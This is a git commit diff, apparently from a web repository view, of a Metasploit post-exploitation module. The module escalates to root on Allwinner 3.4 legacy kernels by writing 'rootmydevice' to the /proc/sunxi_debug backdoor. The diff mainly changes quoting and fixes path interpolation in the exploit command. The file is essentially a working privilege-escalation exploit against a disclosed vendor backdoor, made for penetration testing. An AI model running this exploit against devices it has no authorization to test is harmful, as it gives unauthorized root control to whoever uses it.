working ready for pr
h00die
parent
314d73546c
commit
640e0b9ff7
|
|
@ -3,8 +3,8 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
require 'msf/core'
|
require "msf/core"
|
||||||
require 'rex'
|
#require "rex"
|
||||||
|
|
||||||
class MetasploitModule < Msf::Post
|
class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
|
|
@ -13,46 +13,46 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info={})
|
||||||
super( update_info( info,
|
super( update_info( info,
|
||||||
'Name' => 'Allwinner 3.4 Legacy Kernel Local Privileges Escalation',
|
"Name" => "Allwinner 3.4 Legacy Kernel Local Privileges Escalation",
|
||||||
'Description' => %q{
|
"Description" => %q{
|
||||||
This module attempts to exploit a debug backdoor privilege escalation.
|
This module attempts to exploit a debug backdoor privilege escalation.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
"License" => MSF_LICENSE,
|
||||||
'Author' =>
|
"Author" =>
|
||||||
[
|
[
|
||||||
'h00die <mike@stcyrsecurity.com>', # Module
|
"h00die <mike@stcyrsecurity.com>", # Module
|
||||||
'KotCzarny' # Discovery
|
"KotCzarny" # Discovery
|
||||||
],
|
],
|
||||||
'Platform' => [ 'android', 'linux' ],
|
"Platform" => [ "android", "linux" ],
|
||||||
'DisclosureDate' => 'Apr 30 2016',
|
"DisclosureDate" => "Apr 30 2016",
|
||||||
'References' =>
|
"References" =>
|
||||||
[
|
[
|
||||||
[ 'URL', 'http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/'],
|
[ "URL", "http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/"],
|
||||||
[ 'URL', 'https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us'],
|
[ "URL", "https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us"],
|
||||||
[ 'URL', 'http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390']
|
[ "URL", "http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390"]
|
||||||
],
|
],
|
||||||
'SessionTypes' => [ 'shell', 'meterpreter' ]
|
"SessionTypes" => [ "shell", "meterpreter" ]
|
||||||
))
|
))
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def run
|
def run
|
||||||
backdoor = '/proc/sunxi_debug/sunxi_debug'
|
backdoor = "/proc/sunxi_debug/sunxi_debug"
|
||||||
if file_exist?(backdoor)
|
if file_exist?(backdoor)
|
||||||
vprint_good 'Backdoor found, exploiting.'
|
vprint_good "Backdoor found, exploiting."
|
||||||
cmd_exec('echo "rootmydevice" > #{backdoor}')
|
cmd_exec("echo rootmydevice > #{backdoor}")
|
||||||
if is_root?
|
if is_root?
|
||||||
print_good 'Privilege Escalation Successful'
|
print_good "Privilege Escalation Successful"
|
||||||
report_note(
|
report_note(
|
||||||
:host => session,
|
:host => session,
|
||||||
:type => 'host.escalation',
|
:type => "host.escalation",
|
||||||
:data => 'Escalated to root shell via backdoor'
|
:data => "Escalated to root shell via backdoor"
|
||||||
)
|
)
|
||||||
else
|
else
|
||||||
print_error 'Privilege Escalation FAILED'
|
print_error "Privilege Escalation FAILED"
|
||||||
end
|
end
|
||||||
else
|
else
|
||||||
print_error 'Backdoor #{backdoor} not found.'
|
print_error "Backdoor #{backdoor} not found."
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue